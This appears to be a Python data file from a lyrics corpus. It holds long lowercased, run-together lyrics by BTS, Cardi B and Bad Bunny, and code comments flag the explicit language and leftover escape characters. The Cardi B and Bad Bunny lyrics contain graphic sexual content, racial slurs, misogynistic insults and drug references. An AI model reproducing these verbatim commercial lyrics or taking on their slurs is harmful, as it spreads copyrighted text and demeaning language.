겨울 끝을 지나 다시 봄날이 올 때까지 꽃 피울 때까지 그곳에 좀 더 머물러줘 머물러줘 english translation miss you oooh oooh miss you saying this makes me miss you even more miss you even though im looking at your photo times so cruel i hate us seeing each other for once is now so hard between us its all winter here even in august my heart is running on 
the time alone on the snowpiercer wanna get to the other side of the earth holding your hand wanna put an end to this winter how much longing should we see snowing down to have the days of spring friend like the tiny dust tiny dust floating in the air will i get to you a little faster if i was the snow in the air pre snowflakes fall down and get farther away little by little i miss you i miss you i miss you i miss you how long do i have to wait and how many sleepless nights do i have to spend to see you to see you to meet you to meet you passing by the edge of the cold winter until the days of spring until the days of flower blossoms please stay please stay there a little longer 4 is it you who changed is it you who changed or is it me or is it me i hate this moment this time flowing by we are changed you know just like everyone you know 5 yes i hate you you left me but i never stopped thinking about you not even a day honestly i miss you but ill erase you 'cause it hurts less than to blame you 6 i try to exhale you in pain like smoke like white smoke i say that ill erase you but i cant really let you go yet pre snowflakes fall down and get farther away little by little i miss you i miss you i miss you i miss you how long do i have to wait and how many sleepless nights do i have to spend to see you to see you to meet you to meet you you know it all youre my best friend the morning will come again no darkness no season is eternal pre maybe its cherry blossoms and this winter will be over i miss you i miss you i miss you i miss you wait a little bit just a few more nights ill be there to see you i'll go there to meet you ill come for you i'll come for you passing by the edge of the cold winter until the days of spring until the days of flower blossoms please stay please stay there a little longer romanization bogo sipda oooh oooh bogo sipda ireohge malhanikka deo bogo sipda neohui saeul bogo isseodo bogo sipda neomu yasokhan sigan naneun uriga mipda ijen eolgul han 
beon boneun geosdo himdeureo uriga yeogin ontong gyeoul ppuniya palworedo gyeouri wa maeumeun siganeul dallyeogane hollo nameun seolgugyeolcha ni son japgo jigu bandaepyeonkkaji ga gyeoureul kkeutnaegopa geuriumdeuri eolmana nuncheoreom naeryeoya geu bomnari olkka friend heogongeul tteodoneun jageun meonjicheoreom jageun meonjicheoreom nallineun nuni naramyeon jogeum deo ppalli nege daheul su isseul tende pre nunkkocci tteoreojyeoyo tto jogeumssik meoreojyeoyo bogo sipda bogo sipda bogo sipda bogo sipda eolmana gidaryeoya tto myeot bameul deo saewoya neol boge doelkka neol boge doelkka mannage doelkka mannage doelkka chuun gyeoul kkeuteul a dasi bomnari ol ttaekkaji kkot piul ttaekkaji geugose jom deo meomulleojwo meomulleojwo 4 niga byeonhan geonji niga byeonhan geonji animyeon naega byeonhan geonji animyeon naega byeonhan geonji i sungan heureuneun siganjocha miwo uriga byeonhan geoji mwo moduga geureon geoji mwo 5 geurae mipda niga neon tteonassjiman dan harudo neoreul ijeun jeogi eopseossji nan soljikhi bogo sipeunde iman neoreul jiulge geuge neol wonmanghagibodan deol apeunikka 6 sirin neol bureonae bonda yeongicheoreom hayan yeongicheoreom malloneun jiunda haedo sasil nan ajik neol bonaeji moshaneunde pre nunkkocci tteoreojyeoyo tto jogeumssik meoreojyeoyo bogo sipda bogo sipda bogo sipda bogo sipda eolmana gidaryeoya tto myeot bameul deo saewoya neol boge doelkka neol boge doelkka mannage doelkka mannage doelkka you know it all youre my best friend achimeun dasi ol geoya eotteon eodumdo eotteon gyejeoldo yeongwonhal sun eopseunikka pre beojkkocci pinabwayo i gyeouldo kkeuti nayo bogo sipdabogo sipda bogo sipdabogo sipda jogeumman gidarimyeon myeochil bamman deo saeumyeon mannareo galge mannareo galge derireo galge derireo galge chuun gyeoul kkeuteul a dasi bomnari ol ttaekkaji kkot piul ttaekkaji geugose jom deo meomulleojwo meomulleojwo heavy breathing verse 오늘따라 림이 멀어보여 코트 위에 한숨이 고여 현실이 두려운 소년 공을 던질 때면 유일하게 맘이 되려 놓여 홀로 던지는 공 림을 향해서 내가 던지는 건 수많은 고민과 삶의 걱정거리 
세상을 아는 척 하지만 아직 설익은 몸 슛 코트가 나의 놀이터 손짓에 따라서 발 옆엔 작은 공이 튀어 성적은 바닥을 기지만 난 더 오히려 세상에 다 잘 될 거라며 괜시리 소리쳐 하지만 세상은 되려 겁줘 그럴 거면 멈춰 머리를 채운 상념 공 대신 미래를 던져 또 남들이 칠하는 별점과 성공의 기준에 결격 덕에 암처럼 퍼지는 걱정 god damn it 던져버린 공과 함께 퍼 웃음 턱까지 차오른 이 숨은 꿈틀대는 꿈들 빨라지는 드리블 행복해지는 마음 이 순간은 영원할 듯 하지만 해지는 밤이 다시 찾아오면 좀먹는 현실 정신을 차리면 또 겁먹은 병신 같은 내 모습에 자꾸만 또 겁이 나 덮쳐오는 현실감 남들은 앞서 달려 가는데 왜 난 아직 여기 있나 숨을 쉬어 아니면 꿈을 꿔 지금 심장박동에 맞춰 다시 노를 저어 남들의 얄팍한 잣대에 갇혀 모른 척 하며 살다간 코트처럼 인생도 노을 져 what am i doin' with my life 이 순간은 언제든 다시 찾아오지 않아 다시 나에게 되물어봐 지금 행복한가 그 답은 이미 정해졌어 난 행복하다 heavy breathing 방탄소년단 filter 너의 따분한 그 표정 지루한 발끝 please look at me now 핸드폰은 내려놔 고개 돌릴 생각도 마 let me know your type 날 골라 쓰면 돼 yeah pre oh 너의 눈을 나의 손으로 포개 oh 다가가 비밀에 널 데려갈게 완전히 새로운 세상에 yeah 네 감은 눈을 떠봐 이제 go 팔레트 속 색을 섞어 pick your filter 어떤 나를 원해 너의 세상을 변화시킬 im your filter 네 맘에 씌워줘 okay 어때 조금 느낌이 와 아직 모자라 yes girl you have your chance i can be your genie how bout aladdin 뭐든 돼 줄게 날 골라 쓰면 돼 yeah pre oh 네 꿈처럼 널 감싸 안을 거야 oh 은밀한 spec이야 난 너를 위해 매일 새로울 거야 늘 똑같은 건 재미없잖아 팔레트 속 색을 섞어 pick your filter 어떤 나를 원해 너의 세상을 변화시킬 im your filter 네 맘에 씌워줘 불현듯 아이로 변한 날 봐 볼수록 귀여워 미치도록 미치도록 취향도 기준도 뛰어넘어 넌 오직 나만을 원하게 돼 yeah 날 만든 사람 바로 너니까 난 여태 네가 본 적 없는 brand new filter 내게 널 맡겨봐 더 짜릿한 걸 볼 수 있게 pick your filter 나만을 담아봐 post nanananananananana pick your filter 나만을 담아봐 nanananananananana im your filter 내게 널 맡겨봐 새로운 우리가 될 거야 ayy 날 네 맘에 씌워줘 방탄소년단 잠시 jung kook 매번 같은 하루들 중에 들 중에 너를 만날 때 가장 난 행복해 행복해 매번 다른 일상들 속에 들 속에 너란 사람은 내게 가장 특별해 특별해 별일은 없지 아픈 곳은 없겠지 난 요즘에 글쎄 붕 떠 버린 것 같아 많은 시간 덕에 이런 노랠 쓰네 이건 너를 위한 노래 yeah 노래 yeah 노래 jung kook 자 떠나자 푸른 바다로 우리가 함께 뛰어놀던 저 푸른 바다로 괜한 걱정들은 잠시 잠시 내려놓은 채로 잠시 잠시 우리끼리 즐겨보자 함께 추억하는 푸른 바다 한가운데 작은 섬 jung kook 비록 지금은 멀어졌어도 우리 마음만은 똑같잖아 내 곁에 네가 없어도 yeah 네 곁에 내가 없어도 yeah 우린 함께인 걸 다 알잖아 매번 같은 하루들 중에 들 중에 너를 만날 때 가장 난 행복해 행복해 매번 다른 일상들 속에 들 속에 너란 사람은 내게 가장 특별해 특별해 4 아침 들풀처럼 일어나 거울처럼 난 너를 확인 눈꼽 대신 너만 묻었다 잔뜩 또 무겁다 멍 많은 무르팍이 거릴 거닐며 생각해 이 별이 허락해 주는 우리의 거리 oh can i be your bibilly hills like you did the same to me baby 5 너무 빠른 건 조금 위험해 너무 느린 건 조금 지루해 너무 빠르지도 않게 또는 느리지도 
않게 우리의 속도에 맞춰 가보자고 이건 꽤나 긴 즐거운 롤러코스터 all 비록 지금은 멀어졌어도 우리 마음만은 똑같잖아 내 곁에 네가 없어도 yeah 네 곁에 내가 없어도 yeah 우린 함께인 걸 다 알잖아 매번 같은 하루들 중에 들 중에 너를 만날 때 가장 난 행복해 행복해 매번 다른 일상들 속에 들 속에 너란 사람은 내게 가장 특별해 특별해"]
# Lyrics-corpus entry: a one-element list holding several Cardi B tracks
# concatenated into a single lowercased, punctuation-stripped string
# (apostrophes kept). NOTE(review): contains explicit language — this is
# runtime data and must not be edited or "cleaned up".
# NOTE(review): literal "\u2005" sequences appear in the text — presumably
# scraping artifacts (four-per-em space escapes left unconverted); confirm
# before any downstream text processing relies on whitespace splitting.
cardi10 = ["up up up ayy up uh up look this is fire once upon a time man i heard that i was ugly came from a bitch who nigga wanna fuck on me i said my face bomb ass tight racks stack up shaq height jewelry on me flashlight i been lit since last night hit him with that good good make a nigga act right broke boys don't deserve no pussy i know that's right pre big bag bussin' out the bentley bentayga man balenciaga bardi back and all these bitches fucked it's big bags bussin' out the bentley bentayga man birkin bag bardi back and all you bitches fucked if it's up then it's up then it's up then it's stuck if it's up then it's up then it's up then it's stuck huh ayy up then it's up if it's up then it's stuck huh if it's up then it's up then it's up then it's stuck huh woo i could make the party hot i could make your body rock bitches say they fuckin' with me chances are they probably not if i had a dick you'd probably lick it like a lollipop hoes speakin' capenese hit 'em with karate chop i'm forever poppin' shit pullin' up and droppin' shit gotta argue with him 'cause a nigga love a toxic bitch niggas out here playin' gotta make 'em understand if ain't no ring on my finger you ain't goin' on my 'gram i said my face bomb ass tight racks stack up shaq height yeah jewelry on me flashlight huh i been lit since last night woo hit him with that good good make a nigga act right ah broke boys don't deserve no pussy i know that's right pre big bag bussin' out the bentley bentayga man balenciaga bardi back and all these bitches fucked woo it's big bags bussin' out the bentley bentayga man birkin bag bardi back and all you bitches fucked if it's up then it's up then it's up then it's stuck if it's up then it's up then it's up then it's stuck huh ayy up then it's up if it's up then it's stuck if it's up then it's up then it's up then it's stuck huh ayy bitches ain't fuckin' with me now and i can see why dirtyass dustyass bitch you got pink eye bitches want smoke until i bring it 
to they doorstep tell that bitch back back breath smell like horse sex ha put it on him now he will never be the same he won't tatted on my ass 'cause i really like the pain ah he nutted on my butt i said i'm glad that you came if that nigga had a twin i would let 'em run a train skrrt pre big bag bussin' out the bentley bentayga man balenciaga bardi back and all these bitches fucked woo it's big bags bussin' out the bentley bentayga man birkin bag bardi back and all you bitches fucked ooh if it's up then it's up then it's up then it's stuck if it's up then it's up then it's up then it's stuck huh woo up then it's up if it's up then it's stuck woo if it's up then it's up then it's up then it's stuck huh look gotta play it safe huh no face no case hahaha cardi b bardi in a 'rari diamonds all over my body 0 you a fool for this one shinin'\u2005all\u2005over my body bardi\u2005put that lil' bitch on molly bardi cheeze\u2005beatz cardi b your bitch wanna party with cardi gang cartier cardi in a 'rari skrrtskrrt diamonds all over my body shinin' all over my body cardi got your bitch on molly bitch you ain't gang you lame bentley truck lane to lane blow out the brain i go insane insane i drop a check on the chain fuck up a check in the flame cardi took your man you upset uh cardi got rich they upset yeah cardi put the pussy on offset cardi b cardi b brain on offset cardi took your man you upset uh cardi got rich they upset yeah cardi put the pussy on offset cardi b cardi b brain on offset verse playboi carti who you know in that new 'rari what yeah hold up we poppin' these pills percocets thought it was molly check it out hold up all of these flows is stylish check it out what shawty got playboi behind her playboi who you know harder than carti check it out check it out you know i got goons in the lobby yeah no i can't fuck with nobody yeah yeah these niggas they timid they ain't 'bout it hold up yeah what fucking your bitch she on my head like a bonnet bitch my young 
nigga fresh out the projects hold up bitch diamonds they jump out the fountain what hold up i'm counting no fuckin' accountant shit hold up don't care if that pussy got mileage hold up yeah young nigga i'm styling your stylist cardi b playboi carti your bitch wanna party with cardi woo cartier cardi in a 'rari skrrtskrrt diamonds all over my body shinin' all over my body cardi got your bitch on molly bitch you ain't gang you lame yeah yeah bentley truck lane to lane blow out the brain hold up yeah i go insane insane hold up i drop a check on the chain fuck up a check in the flame hold up hold up hold up cardi took your man you upset uh what cardi got rich they upset yeah yeah cardi put the pussy on offset cardi b cardi b brain on offset ha cardi took your man you upset uh yeah cardi got rich they upset yeah what cardi put the pussy on offset yeah cardi b cardi b brain on offset hold up hold up check it out playboi carti cardi b hold up hold up cardi hold up yeah woo woo hold up cardi hold up ooh hold up ooh verse look they gave a bitch two options strippin' or lose used to dance in a club right across from my school i said dance not fuck don't get it confused had to set the record straight 'cause bitches love to assume mama couldn't give it to me had to get it at sue's lord only knows how i got in those shoes i was covered in dollars now i'm drippin' in jewels a bitch play with my money might as well spit in my food bitches hated my guts now they swear we was cool went from makin' tuna sandwiches to makin' the news i started speakin' my mind and tripled my views real bitch only thing fake is the boobs get money go hard you're mothafuckin' right never been a fraud in my mothafuckin' life get money go hard damn fuckin' right stunting on these bitches out of mothafuckin' spite ain't no runnin' up on me went from nothin' to glory i ain't tellin' y'all to do it i'm just tellin' my story i don't hang with these bitches 'cause these bitches be corny and i got enough bras 
y'all ain't gotta support me i went from rag to riches went from wic to lit nigga only person in my fam to see six figures the pressure on your shoulders feel like boulders when you gotta make sure that everybody straight bitches stab you in your back while they smilin' in your face talking crazy on your name trying not to catch a case i waited my whole life just to shit on niggas climbed to the top floor so i can spit on niggas said i was just tryna chill and make bangers bangers tell all these old bitches they in danger stop the thing on my hip whip bitches into shape brrrt that's what i call a fuckin' waist trainer you gon' run up on who and do what who i think y'all got your story screwed up yeah i came here to ball is you nuts i don't want your punkass man i'm too tough facts i'm the one that's killin' shit hands down hands down if you got a problem with me say it now say it 'cause i don't wanna hear no sneak dissin' huh 'specially not from one you weak bitches i'm on go like i don't see no stop lights skrrt i'm steppin' out every day prom night facts so if it's all love show me love then huh 'cause you hatin' on a bitch that's what it sounds like beast mode that's how i give it up nigga hoodie low that's how i'm pullin' up just 'cause i been on the road don't mean i been on the run and you gon' have to learn to hold your tongue or hold the gun brrrt woo and we all know you ain't that type no i smack you and the bitch that you act like yeah i started gettin' money bitches upset cash they remind me of my pussy bitches mad tight nails done hair laid keep 'em both laced laced cocome through shinin' with a rollie bust face shine heheadshot headshot tell 'em closed case ain't no bitch spittin' like this since '08 i don't trust no nigga i don't fear no bitch fear no bitch whole life been through some fucked up shit fucked up shit they say i'm too that oh i'm too this when you see what i've seen you end up like this woo i walked into the label where the check at 
where the check cardi b on the charts ain't expect that where that bitch that was claimin' she a threat where i'ma put a louboutin where her neck at they say i'm too ratchet they say i act wild i act wild wild i'm tryna whip the foreign like a bad ass child bad ass child skrrt they caught me slippin' once tell 'em try that now try that now cardi b know it's me hear that blap sound blap man i said we gon' win knock me down nine times but i get up ten look myself in the mirror i say we gon' win knock me down nine times but i get up ten look myself in the mirror i say we gon' win knock me down nine times but i get up ten yeah but i get up ten knock me down nine times but i get up ten bitch woo i'ma make a fuck nigga feel me yeah said i'ma do a broke bitch filthy ah i'ma make a fuck nigga feel me grrr said i'ma do a broke bitch filthy grrr we gon' win knock me down nine times but i get up ten woo yeah i said we gon' win knock me down nine times but i get up ten bitch grrr artist cardi b song do me dat remix featuring branson forbes lyrics explicit record label region liberty records \u2005atlantic\u2005records c genius 09 cardi\u2005b shouldn't do the ting\u2005them what you do hop on top i wanna ride i do a kegel while you switch side know mi woulda buy di world fi you call me cardi spit in my mouth look in my eyes pussy is wet come take a dive shouldn't do the ting them what you do prehook x do do me dat shouldn't do do do me dat shouldn't do me dat girl do do do me dat shouldn't do do do me dat shouldn't turn your back girl 876 work hard now my whip game was on zero i thought i was your hero but little did i know you were creeping on the low how could you do this to me right now my tank is on e girl give a hook x do do me dat shouldn't do do do me dat shouldn't do me dat girl do do do me dat shouldn't do do do me dat shouldn't turn your back girl look how far were coming from from the day mon naw have no money no have no house mon bruck and hungry you tell me seh 
you love but as soon as you see the bling you forget every single thing what me did do for you but now them lick you down and me don't want you now so what you gonna do what you gonna do hook x do do me dat shouldn't do do do me dat shouldn't do me dat girl do do do me dat shouldn't do do do me dat shouldn't turn your back girl brige shouldn't do the ting them what you do you know me would have buy the world for you me could've buy the close them what you want to wearme work so hard me haffi ask a question why you would have cheatwhy you would have leavewhy you would've do the ting them fi displease mewhy you would have cheatwhy you would leave me hook 4x do do me dat shouldn't do do do me dat shouldn't do me dat girl do do do me dat shouldn't do do do me dat shouldn't turn your back girl verse bx they know i rep that bitches step back i'm right back on my bullshit you\u2005can\u2005bet that wack hoes\u2005i never stress that i don't\u2005address that cardi b find me anywhere the check at these bum bitches is broke and i don't respect that lot of sugar daddy talk but they don't reflect that you ain't open up no business got no benzes i be in a mansion and you be in my mentions i came right out the trenches to top of the charts lost friends on the way this shit is breakin' my heart 'bout thirty seconds in i'm like where do i start i don't act i'm a hustler just playin' my part what you spend on your whip bitch i spend on my fit y'all let your man hit 'cause he been on my dick i'm 'bout to follow him back and send him a pic of me holdin' my grammy rubbin' my clit get that input i guarantee the outcome ass fat but i still poke it out some make your nigga play the middle like he malcolm this just a little somethin' 'til i finish up the album bitch ha suck my dick suck my dick kodak black ayy ayy you know you know why i fuck with cardi b 'cause they be thinkin' they be thinkin' both of us crazy and shit like this sound like some some some bodak orange shit or some some 
kodak orange shit man like ayy cardi b kodak black said lil' bitch you can't fuck with me if you wanted to ayy ayy ayy these expensive these is red bottoms these is bloody shoes woo woo woo yah yah they're bloody shoes bloody shoes hit the store i can get 'em both i don't wanna choose yah yah yah wanna choose ayy and i'm quick cut a nigga off so don't get comfortable look woo yah yah yah bih' don't get comfortable ayy ayy ayy i don't dance now i make money moves yeah bih' i make money moves ayy said i don't gotta dance i make money moves woo bih i make money moves ayy ayy ayy if i see you and i don't speak that means i don't fuck with you nigga i don't fuck with you ayy i don't fuck with you i'm a boss you a worker bitch i make bloody moves yah i make money moves verse kodak black i ain't worried 'bout her that's an old ho you thought i was comin' with my old flow kodak ain't com to take no photo i don't even pull up in a four door i just hit a lick hit the load though all my life smokin' on jojo he was just posted up with dough though now he gettin' slammed by the popo thuggish buggish ruggish shit i can't leave the streets i love this shit never gave a shit 'bout a messy bitch i ain't never take a risk for a petty lick i'm at digital heights and i'm goin' on a heist dead presidents john kennedy dead presidents pockets mount everest when i step on the scene it's a felony yeah yeah christian louboutin yeah these ain't louis vuittons huh hit a kodak bop on nae nae i wanna top me a nae nae now i'm in a white whip no mayonnaise stole a new car for me audi a8 cardi b brought the beat told me rerock the heat try me i'll do the race like i'm tayk it ain't no flockin' over here lil' buddy all of us zombies over here lil' buddy all of us robbin' 'cause they love your money got our own money but we love your money crack a nigga's head wide open like a pumpkin jaguar ftype orange like a pumpkin young nigga i got old hundreds smokin' k with my bunkie woo cardi b lil' bitch 
you can't fuck with me if you wanted to woo these expensive these is red bottoms these is bloody shoes woo woo hit the store i can get 'em both i don't wanna choose and i'm quick cut a nigga off so don't get comfortable look ayy woo i don't dance now i make money moves ayy ayy said i don't gotta dance i make money moves woo if i see you and i don't speak that means i don't fuck with you i'm a boss you a worker bitch i make bloody moves bloody moves bloody moves bloody moves lyrics from snippet stylin' on these hoes i'm stylin' on these hoes i be stylin' on these hoes i'm stylin' on these hoes wrist full of gold i be stylin' on these niggas stylin' on these hoes grind up a check got it at the store runnin' through the checks till the club close stylin' on these niggas stylin' on these hoes i be stylin' on these bitches stylin' on these hoes i gotta get it i need the chicken i need the bread that's why i'm workin' and i'm in the benz 'cause you in the bed bitches is sleepin' fuck is they thinkin' what is you doin' then they be mad lookin' at me like i did something to 'em uh bank account on racks pussy still on drip drop put this pussy on wax took me straight to the tip top i might race with the wraith ain't no space in the safe next bitch in my face catchin' case catchin' case but anywho anywho birkin bag jimmy choos all my bitches say eeeeooowwww all my guns go boom more guns than the warden smack hoes with my jordans pussy's floodin' new orleans kiss a bitch and i'm gorgeous never been no pussy yo i'm always with the shits i ain't never been no dirty broad but now i'm filthy rich bitch bitch stylin' on these hoes i'm stylin' on these hoes i be stylin' on these hoes i'm stylin' on these hoes wrist full of gold i be stylin' on these niggas stylin' on these hoes grind up a check got it at the store runnin' through the checks till the club close stylin' on these niggas stylin' on these hoes i be stylin' on these bitches stylin' on these hoes money money money money's 
all i think of i swear to god i wake up and get the green stuff you put your money on these hoes get your refund i just got my nails did i just got my weave done if you want a fly press put bardi on that shit i just bought a new gun put a body on that shit she upstairs i'ma wait in the lobby for that bitch i got my bitch and a man that can buy me all that shit you can find my fine ass bathtub with a wine glass all these hoes wanna bring me down i don't never ever mind that can you show me where your money is 'cause i know where mine's at all the energy you put in me you just tryna get the top back lately i been on some conceited shit 'cause i don't need a bitch blast off i don't feed a bitch that's how i treat a bitch in my hood i got hella stripes straight adidas shit hope she got the same energy when i see that bitch bitch stylin' on these hoes i'm stylin' on these hoes i be stylin' on these hoes i'm stylin' on these hoes wrist full of gold i be stylin' on these niggas stylin' on these hoes grind up a check got it at the store runnin' through the checks till the club close stylin' on these niggas stylin' on these hoes i be stylin' on these bitches stylin' on these hoes oh how you doin' i'm alright hahaha verse now how much times do i gotta prove these niggas wrong and how much times i gotta show these bitches i ain't soft how many shows i gotta sell out 'fore you get the cost why they really tryna front like i ain't hit the charts all these labels throwin' deals from left to right but i ain't givin' in until they get them numbers right all these people think that this shit happen overnight all that flexin' they be doin' shit is all a hype no tolerance for a hatin' bitch talkin' shit only time i hold my tongue is when i'm suckin' dick so when i see you in the streets yeah it's fuckin' lit and don't be talkin' all that sorry shit don't flip the script i see the lights i hear the hype i hit the mic i kill the show i get my dough i catch a flight i see a hater i'm 
runnin' down it's on sight i throw my hands i hit em' left i hit em' right they sleepin' on me just because i used to strip but it's all good 'cause now they wanna get up in my vip blowin' up my phone sayin' everythin' i touch is lit actin' corn and wanna fuck me like they wasn't talkin' shit woah i let 'em live let the shady motherfuckers live get them the price then it's time to show them what it is don't got the bat well then what you really tryna pitch don't waste my time i ain't never been no average bitch not to mention i did my tour and that shit was winnin' independent the headline award of feelin' i thank the lord for all the blessings that he is given i love the fans they fill me up with their ammunition i don't really talk shit but now i gotta off this i don't know why bitches think we work in the same office corny bitches tryna keep up look exhausted wave the white flag girl you might as well just forfeit my ex told me i was never gon' be shit lookie lookie now lookie now nigga i'm that bitch what you thought yeah you really lost now you kinda sick but i ain't never need a nigga i was always on my shit yeah i used to stare at magazines on the train lookin' at these models like i gotta be this one day fuck around got myself a name now i'm gettin' paid left the corny bitches in the grave so they throwin' shade lyrics from snippet cardi hop on top uh i wanna ride i do a kegel while it's inside spit\u2005in\u2005my mouth look\u2005in my eyes pussy is wet come\u2005take a dive tie me up like i'm surprised there's roleplay i wear a disguise i want you to park that big mack truck right in this little garage i hate when i'm using a guy and shit and they start catching feelings and\u2005like\u2005no matter what\u2005i tell them like they just\u2005don't stop liking me like i be like listen i'm a hoe i don't cook i don't clean like trust me you don't want me to be the mother of your kids i don't like motherinlaws and they just be on some sooo you don't gotta meet 
my mom like nigga you don't fucking get it though i dont do no sauce niggas lil bitch pop a pill i abort niggas lil bitch and i don't save them i export niggas lil bitch you niggas ass salad tossed niggas lil bitch repeat always talking about what you got so what you got always talking about you run that block nigga really what block always talking about your shooters ha so who y'all shot always talking about your foreign whips nigga really what lot always talking about y'all niggas scam okay you scam but your bank account got 0 dollars so what's the plan boy you lying using hella filters this ain't the gram boy i'm hot i use you to cool me down nigga use the fan i dont do no sauce niggas lil bitch pop a pill i abort niggas lil bitch and i don't save them i export niggas lil bitch you niggas ass salad tossed niggas lil bitch repeat some of you niggas is really too soft i do y'all like frisbees you niggas get tossed always emotional blinging my line go find nemo and nigga get lost cannot talk spicy cause you are not hot you are just sauce you bought me a chain a ring and a watch but how much it cost it's not expensive then he is a not i'm cutting him off they be like cardi why you so cold nigga i don't defrost and i mean it y'all fiending why you scheming you sauce you false won't comment i red beam him i dont do no sauce niggas lil bitch pop a pill i abort niggas lil bitch and i don't save them i export niggas lil bitch you niggas ass salad tossed niggas lil bitch repeat"]
badb10 = ["baby, yo la quiero como tú tetas hechas, culo hecho y actitud hoy te vo'a buscar, ponte la mini que hoy te lo meto en el lamborghini trépate encima de mí-í-í matamos la bellaquera tranquila, no se ve pa' afuera trépate encima de mí-í-í mami, menea ese culo como si estuviera en el tubo capsuleando y bebiendo lean úsame de trampolín trép-trépate encima y hazme venir trépate encima y hazme venir, yeh tú eres la más dura del party no le hace falta nadie con bugatti móntate en mi bicho como en un ferrari ese culo es mío, ma', yo soy tu daddy súbete encima de mi, bebé pa' que veas como te bajo baby, si yo te trabajo te llevó quien te trajo trépate encima de mí-í-í matamos la bellaquera tranquila, no se ve pa' afuera trépate encima de mí-í-í mami, menea ese culo como si estuviera en el tubo ¿qué pasó? carbon, bebé, mueve ese culo como shakira soy tu piqué me gusta como me lo mamas y te toca' a la vez no lo piense, trépate encima de una vez que tú mueres chingando conmigo en este hotel la jalo por el pelo, por el pelo las tetas y el culo le muerdo colombiana me grita, parcero a las amigas, las bajo del vuelo tranquila, compro todo nuevo siete putas a lo melo champaña, no bebo, barceló se graban chupándome el huevo chingando con miles 'e mujeres eso lo saben ustedes nos quedamos de hoteles en hoteles contando billetes de cienes chingamo' con miles 'e mujeres cambio de putas los weeken'es eso lo saben ustedes que contamo' billetes de cienes trépate encima de mí-í-í matamos la bellaquera tranquila, no se ve pa' afuera trépate encima de mí-í-í mami, menea ese culo como si estuviera en el tubo ando en miami girando con tres mamis que son modelos dos se quitaron la ropa una tiene su boca en mi huevo ya se quemaron tres blun'es codeína y un vaso con hielo estamos en un parqueadero carbon fiber contando dinero sigue bailando desnu' pasa el fuego que voy a prende'lo te subiste en mi carro pa' hacerlo tus amigas también se vinieron baby, yo la quiero como tú tetas hechas, 
culo hecho y actitud hoy te vo'a buscar ponte la mini que hoy te lo meto en el lamborghini trépate encima de mí-í-í matamos la bellaquera tranquila, no se ve pa' afuera trépate encima de mí-í-í mami, menea ese culo como si estuviera en el tubo lary over el conejo malo guasón, bebé dímelo, sixto bad bunny sixto rein ¿qué pasó? yo prida ez , e zeta el fucking guasón marco pulgár carbon fiber music frank miami lary over carbon fiber music carbon fiber boys tú y yo somo' exclusivos como las tokyo y las oregón bebé tú eres mi gucci, yo soy tu louis vuitton ella está hecha pa' mí, yo estoy hecho pa' ella dice que no somos famosos y se siente como estrella le pregunté si quería, me dijo que sí todo lo que tengo se lo ofrecí no creía en el amor y la convencí ella es mi beyoncé, yo su jay-z angelina y brad pitt somos lebron y d-wade en los heat nos quedamo' en el ritz y me pide que la parta como parto to' los beats aún recuerdo la primera vez que sin ropa la vi aún recuerdo la primera vez que se lo metí ella es la única que me satisface le queda cabrón todo lo que hace si peleamos rápidamente en la cama hacemos la pases con ella cada pose se siente mejor sexo salvaje cuando hacemos el amor contigo, me olvido de todo lo que hay afuera porque vivimo' en nuestra propia esfera todo rey se merece una reina y la mía eres tú contigo, me olvido de todo lo que hay afuera porque vivimo' en nuestra propia esfera todo rey se merece una reina y la mía eres tú la mía eres tú, la mía eres tú ella ordena mi vida si siento que se derrumba sus ojos no son color sol, pero a mí me alumbran eres más de lo que me merezco pide lo que sea que te obedezco siempre me distingo, restaurantes finos los domingo' los jueves pa' brava, pa' hacerle fiero a los gringos de que tengo una latina bien durota con el botty del caribe pero el glamour de europa llegamo' en la nave espacial, somos una pareja especial con baqueo de residencial, nos quedamos en la suite presidencial lo nuestro es oficial, ponte un 
traje corto y saca ese botty a pasear que yo me doy el guille de que soy el que lo puede acariciar contigo, me olvido de todo lo que hay afuera porque vivimo' en nuestra propia esfera todo rey se merece una reina y la mía eres tú contigo, me olvido de todo lo que hay afuera porque vivimo' en nuestra propia esfera todo rey se merece una reina y la mía eres tú yeh-yeh, yeh-yeh, yeh-yeh la calle está apagá', pero ella la va a prender porque si ella\u2005sale\u2005 to'a la'\u2005amiga' salen en la disco\u2005muy dura', no son normale' una es callá', la otra está bien loca, ey pastilla' y se besan en la boca si ella sale to'a la' amiga' salen en la disco muy dura', no son normale' una es callá', la otra está bien loca, ey pastilla' y se besan en la boca y si ella sale , ey to'a la' amiga' salen comentario' de envidiosa' no le valen no le gustan psycho ni que la acorralen je, je, uy, qué sofoque' mejor no la provoque' que se calla el que la toque a ley de na' pa' que se aloque baby, ese bumper aguanta el choque me gustan naturale' pero no se ve mal lo que se hizo pa' darle tengo permiso le metí en el 37, heh se escucha hasta en el primer piso ven y bájatelo de nuevo dale, yo te aviso , eh la nena tiene poder tranquilita, pero de nadie se deja joder , uh no se deja ver la calle está apagá', pero ella la va a prender porque si ella sale to'a la' amiga' salen en la disco muy dura', no son normale' una es callá', la otra está bien loca, ey pastilla' y se besan en la boca si ella sale to'a la' amiga' salen en la disco muy dura', no son normale' una es callá', la otra está bien loca, ey pastilla' y se besan en la boca yeh-yeh-yeh-yeh-yeh yeh-yeh-yeh-yeh yeh-yeh-yeh-yeh-yeh yeh no sé si tu boca está besando a otra en estos momentos, en estos momentos y no sé si tus ojos ya se olvidaron de mí y los pensamientos se fueron con el tiempo y me pregunto qué hubiera pasado si estuviésemos juntos, aún enamorados y me pregunto qué hubiera pasado si estuviésemos juntos, aún enamorados 
yeh-yeh todavía yo te espero aunque yo sé que tú no vas a volver todavía yo te quiero aunque yo sé que eso me puede joder y tengo tu foto guarda' tú y yo bailando cuando éramo' menore' de edad te digo la verda' te extraño el 14 y en la navidad y lo' polvo' en la parte posterior del carro pa' los tiempo' en la superior siempre dejaba ropa interior cada polvo mejor que el anterior pero no como el primero tú sabe' que ese no se va a borrar ahora me paso en el putero, yeh a otra persona no he podido amar y te juro que lo he trata'o pero es que ninguna se te para al la'o desde que te fuiste sigo trastorna'o escuchando masterpiece, baby, me siento down si no tengo de tu piel, down deuces de ñengo y de la, no la de chris brown el cerebro dando vuelta', lo tengo marea'o cada cual por su la'o, yeh-eh y me pregunto qué hubiera pasado si estuviésemos juntos, aún enamorados y me pregunto qué hubiera pasado si estuviésemos juntos, aún enamorados yeh yeh-yeh-yeh-yeh-yeh-yeh-yeh-yeh-eh ¡ju! okey, ey, ey ante' yo te quería, pero ya no tú me gustaba', pero ya no yo\u2005estaba\u2005pa' ti, pero\u2005ya no ey, pero ya no, ey,\u2005pero ya no ante' yo te quería, pero ya no tú me gustaba', pero ya no yo estaba pa' ti, pero ya no ey, pero ya no, ey, pero ya no conmigo ya no tiene' break, ey ya no quiero de tu 